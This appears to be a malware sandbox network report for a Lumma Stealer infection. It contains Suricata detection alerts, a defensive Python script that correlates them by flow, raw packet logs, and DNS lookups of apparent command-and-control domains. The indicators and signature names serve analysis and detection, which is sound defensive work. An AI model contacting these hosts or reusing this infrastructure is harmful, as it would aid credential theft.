2025-01-07T14:48:25.268050+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49751 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:25.743537+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49751 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:25.743537+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49751 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:26.366865+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49752 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:28.274178+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49752 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:28.874636+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49753 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:30.089413+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49754 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:33.035251+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49755 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:34.030662+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49756 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:35.004044+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49757 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:35.493784+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49757 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:36.452005+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49758 | 185.161.251.21 | 443 | TCP
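The Suricata alerts above are listed one per signature hit, which hides the pattern an analyst actually triages: a low-severity JA3 fingerprint match on a new TLS connection followed, on the same 5-tuple, by a severity-1 Lumma CnC check-in or exfiltration alert. The script below is an added example and not part of the Joe Sandbox report. It embeds the report's alert rows as a constructed sample string (in the "timestamp | sid | signature | severity | src ip | src port | dst ip | dst port | proto" layout), groups them by TCP flow, flags flows where a severity-3 hit escalates to a severity-1 alert within a short window, and lists which destinations are actually confirmed as C2 by a high-severity rule. The escalation window of 5 seconds is an assumption chosen for this example, not a Suricata or sandbox setting.

```python
"""Correlate Suricata alerts by TCP flow (added example, not report code)."""
from collections import defaultdict
from datetime import datetime

# Constructed sample input: the report's Suricata alert rows, one per line.
ALERTS = """\
2025-01-07T14:48:24.252351+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49750 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:24.781192+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49750 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:24.781192+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49750 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:25.268050+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49751 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:25.743537+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49751 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:25.743537+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49751 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:26.366865+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49752 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:28.274178+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49752 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:28.874636+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49753 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:30.089413+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49754 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:33.035251+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49755 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:34.030662+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49756 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:35.004044+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49757 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:35.493784+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49757 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:36.452005+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49758 | 185.161.251.21 | 443 | TCP
"""


def parse_alert(line):
    """Split one pipe-separated alert row into typed fields."""
    ts, sid, sig, sev, sip, sport, dip, dport, proto = [f.strip() for f in line.split(" | ")]
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
        "sid": int(sid), "sig": sig, "sev": int(sev),
        "src": sip, "sport": int(sport), "dst": dip, "dport": int(dport), "proto": proto,
    }


def correlate(text):
    """Group alerts by (src ip, src port, dst ip, dst port); each group is one TCP flow."""
    flows = defaultdict(list)
    for line in text.splitlines():
        if line.strip():
            a = parse_alert(line)
            flows[(a["src"], a["sport"], a["dst"], a["dport"])].append(a)
    for alerts in flows.values():
        alerts.sort(key=lambda a: a["ts"])
    return dict(flows)


def escalated_flows(flows, window_s=5.0):
    """Flows where a severity-3 fingerprint hit is followed within window_s seconds
    by a severity-1 alert on the same flow. window_s is an assumed triage threshold."""
    hits = {}
    for key, alerts in flows.items():
        low = [a for a in alerts if a["sev"] == 3]
        high = [a for a in alerts if a["sev"] == 1]
        if any(0 <= (h["ts"] - l["ts"]).total_seconds() <= window_s for l in low for h in high):
            hits[key] = [a["sig"] for a in alerts]
    return hits


def confirmed_c2(flows):
    """Destinations reached by at least one severity-1 (malware-specific) alert.
    A JA3-only hit, like the one to 185.161.251.21, does not make this list."""
    return sorted({(k[2], k[3]) for k, alerts in flows.items() if any(a["sev"] == 1 for a in alerts)})


if __name__ == "__main__":
    flows = correlate(ALERTS)
    for (src, sport, dst, dport), sigs in escalated_flows(flows).items():
        print(f"{src}:{sport} -> {dst}:{dport}")
        for s in sigs:
            print("   ", s)
    print("confirmed C2 endpoints:", confirmed_c2(flows))
```

Run as written, the script reports four escalated flows (client ports 49750, 49751, 49752 and 49757) and a single confirmed C2 endpoint, 188.114.97.3:443; the 49758 connection to 185.161.251.21 is fingerprint-only and stays a lead rather than a confirmed indicator.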
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 7, 2025 14:48:23.764594078 CET | 49750 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:23.764674902 CET | 443 | 49750 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:23.764786959 CET | 49750 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:23.767791986 CET | 49750 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:23.767826080 CET | 443 | 49750 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:24.252276897 CET | 443 | 49750 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:24.252351046 CET | 49750 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:24.258789062 CET | 49750 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:24.258805037 CET | 443 | 49750 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:24.259143114 CET | 443 | 49750 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:24.335743904 CET | 49750 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:24.335783005 CET | 49750 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:24.335932970 CET | 443 | 49750 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:24.781213045 CET | 443 | 49750 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:24.781305075 CET | 443 | 49750 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:24.781367064 CET | 49750 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:24.783373117 CET | 49750 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:24.783396006 CET | 443 | 49750 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:24.783442020 CET | 49750 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:24.783447027 CET | 443 | 49750 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:24.790906906 CET | 49751 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:24.791013956 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:24.791112900 CET | 49751 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:24.792069912 CET | 49751 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:24.792084932 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:25.267951012 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:25.268049955 CET | 49751 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:25.269505978 CET | 49751 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:25.269515038 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:25.269746065 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:25.271086931 CET | 49751 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:25.271104097 CET | 49751 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:25.271156073 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:25.743546009 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:25.743604898 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:25.743640900 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:25.743664980 CET | 49751 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:25.743674040 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:25.743700027 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:25.743742943 CET | 49751 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:25.743751049 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:25.743786097 CET | 49751 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:25.744082928 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:25.744160891 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:25.746269941 CET | 49751 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:25.746285915 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:25.748363972 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:25.748413086 CET | 49751 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:25.748430014 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:25.748527050 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:25.748565912 CET | 49751 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:25.748573065 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:25.748641014 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:25.748691082 CET | 49751 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:25.749089003 CET | 49751 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:25.749105930 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:25.749119043 CET | 49751 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:25.749125957 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:25.897253990 CET | 49752 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:25.897305965 CET | 443 | 49752 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:25.897398949 CET | 49752 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:25.897685051 CET | 49752 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:25.897701025 CET | 443 | 49752 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:26.366780043 CET | 443 | 49752 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:26.366864920 CET | 49752 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:26.388135910 CET | 49752 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:26.388158083 CET | 443 | 49752 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:26.388386965 CET | 443 | 49752 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:26.391516924 CET | 49752 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:26.391798973 CET | 49752 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:26.391832113 CET | 443 | 49752 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:26.391890049 CET | 49752 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:26.391896963 CET | 443 | 49752 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:28.274183035 CET | 443 | 49752 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:28.274286985 CET | 443 | 49752 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:28.274419069 CET | 49752 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:28.274758101 CET | 49752 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:28.274775028 CET | 443 | 49752 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:28.401660919 CET | 49753 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:28.401730061 CET | 443 | 49753 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:28.401837111 CET | 49753 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:28.402187109 CET | 49753 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:28.402203083 CET | 443 | 49753 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:28.874521971 CET | 443 | 49753 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:28.874635935 CET | 49753 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:28.876116037 CET | 49753 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:28.876127005 CET | 443 | 49753 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:28.876401901 CET | 443 | 49753 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:28.877712965 CET | 49753 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:28.877851963 CET | 49753 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:28.877885103 CET | 443 | 49753 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:29.407042027 CET | 443 | 49753 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:29.407133102 CET | 443 | 49753 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:29.407196999 CET | 49753 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:29.407440901 CET | 49753 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:29.407455921 CET | 443 | 49753 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:29.608649969 CET | 49754 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:29.608694077 CET | 443 | 49754 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:29.608931065 CET | 49754 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:29.609134912 CET | 49754 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:29.609149933 CET | 443 | 49754 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:30.089302063 CET | 443 | 49754 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:30.089412928 CET | 49754 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:30.091033936 CET | 49754 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:30.091051102 CET | 443 | 49754 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:30.091290951 CET | 443 | 49754 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:30.092731953 CET | 49754 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:30.092911959 CET | 49754 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:30.092947960 CET | 443 | 49754 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:30.093034029 CET | 49754 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:30.093044996 CET | 443 | 49754 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:31.009532928 CET | 443 | 49754 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:31.009654999 CET | 443 | 49754 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:31.009720087 CET | 49754 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:31.009928942 CET | 49754 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:31.009948969 CET | 443 | 49754 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:32.559742928 CET | 49755 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:32.559783936 CET | 443 | 49755 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:32.559864044 CET | 49755 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:32.560241938 CET | 49755 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:32.560256958 CET | 443 | 49755 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:33.035168886 CET | 443 | 49755 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:33.035250902 CET | 49755 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:33.036957026 CET | 49755 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:33.036966085 CET | 443 | 49755 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:33.037233114 CET | 443 | 49755 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:33.038923025 CET | 49755 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:33.039015055 CET | 49755 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:33.039020061 CET | 443 | 49755 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:33.469459057 CET | 443 | 49755 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:33.469556093 CET | 443 | 49755 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:33.469640017 CET | 49755 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:33.469844103 CET | 49755 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:33.469860077 CET | 443 | 49755 | 188.114.97.3 | 192.168.2.4
Jan 7, 2025 14:48:33.548775911 CET | 49756 | 443 | 192.168.2.4 | 188.114.97.3
Jan 7, 2025 14:48:33.548814058 CET | 443 | 49756 | 188.114.97.3 | 192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:33.548933983 CET49756443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:33.549263954 CET49756443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:33.549277067 CET44349756188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:34.030498028 CET44349756188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:34.030662060 CET49756443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:34.032491922 CET49756443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:34.032500982 CET44349756188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:34.032762051 CET44349756188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:34.055577993 CET49756443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:34.055680990 CET49756443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:34.055690050 CET44349756188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:34.543051004 CET44349756188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:34.543169975 CET44349756188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:34.543257952 CET49756443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:34.543533087 CET49756443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:34.543559074 CET44349756188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:34.547749996 CET49757443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:34.547785997 CET44349757188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:34.547888994 CET49757443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:34.548191071 CET49757443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:34.548203945 CET44349757188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:35.003927946 CET44349757188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:35.004044056 CET49757443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:35.005501986 CET49757443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:35.005512953 CET44349757188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:35.005752087 CET44349757188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:35.007061005 CET49757443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:35.007086992 CET49757443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:35.007129908 CET44349757188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:35.493788004 CET44349757188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:35.493880987 CET44349757188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:35.494010925 CET49757443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:35.494446993 CET49757443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:35.494446993 CET49757443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:35.494468927 CET44349757188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:35.494482040 CET44349757188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:35.607413054 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                            Jan 7, 2025 14:48:35.607469082 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:35.607551098 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                            Jan 7, 2025 14:48:35.608098984 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                            Jan 7, 2025 14:48:35.608119965 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:36.451925039 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:36.452004910 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                            Jan 7, 2025 14:48:36.453728914 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                            Jan 7, 2025 14:48:36.453741074 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:36.454046011 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:36.455204964 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                            Jan 7, 2025 14:48:36.499329090 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:36.714226961 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:36.714302063 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:36.714382887 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                            Jan 7, 2025 14:48:36.714659929 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                            Jan 7, 2025 14:48:36.714683056 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:36.714694977 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                            Jan 7, 2025 14:48:36.714700937 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:37.995044947 CET5595953192.168.2.4162.159.36.2
                                                                                                                                                            Jan 7, 2025 14:48:38.000561953 CET5355959162.159.36.2192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:38.000690937 CET5595953192.168.2.4162.159.36.2
                                                                                                                                                            Jan 7, 2025 14:48:38.005702019 CET5355959162.159.36.2192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:38.451484919 CET5595953192.168.2.4162.159.36.2
                                                                                                                                                            Jan 7, 2025 14:48:38.456618071 CET5355959162.159.36.2192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:38.456861973 CET5595953192.168.2.4162.159.36.2
                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Jan 7, 2025 14:48:23.746438026 CET5592353192.168.2.41.1.1.1
                                                                                                                                                            Jan 7, 2025 14:48:23.759577990 CET53559231.1.1.1192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:35.497946978 CET5886853192.168.2.41.1.1.1
                                                                                                                                                            Jan 7, 2025 14:48:35.606009960 CET53588681.1.1.1192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:36.923531055 CET5823953192.168.2.41.1.1.1
                                                                                                                                                            Jan 7, 2025 14:48:36.935179949 CET53582391.1.1.1192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:37.861615896 CET5687153192.168.2.41.1.1.1
                                                                                                                                                            Jan 7, 2025 14:48:37.870748043 CET53568711.1.1.1192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:37.991096020 CET5363625162.159.36.2192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:38.467614889 CET5287653192.168.2.41.1.1.1
                                                                                                                                                            Jan 7, 2025 14:48:38.495732069 CET53528761.1.1.1192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 7, 2025 14:48:23.746438026 CET | 192.168.2.4 | 1.1.1.1 | 0xdba5 | Standard query (0) | skinfuzzerz.cyou | A (IP address) | IN (0x0001) | false
Jan 7, 2025 14:48:35.497946978 CET | 192.168.2.4 | 1.1.1.1 | 0x900f | Standard query (0) | cegu.shop | A (IP address) | IN (0x0001) | false
Jan 7, 2025 14:48:36.923531055 CET | 192.168.2.4 | 1.1.1.1 | 0xc574 | Standard query (0) | klipvumisui.shop | A (IP address) | IN (0x0001) | false
Jan 7, 2025 14:48:37.861615896 CET | 192.168.2.4 | 1.1.1.1 | 0xa417 | Standard query (0) | dfgh.online | A (IP address) | IN (0x0001) | false
Jan 7, 2025 14:48:38.467614889 CET | 192.168.2.4 | 1.1.1.1 | 0xee9c | Standard query (0) | 241.42.69.40.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
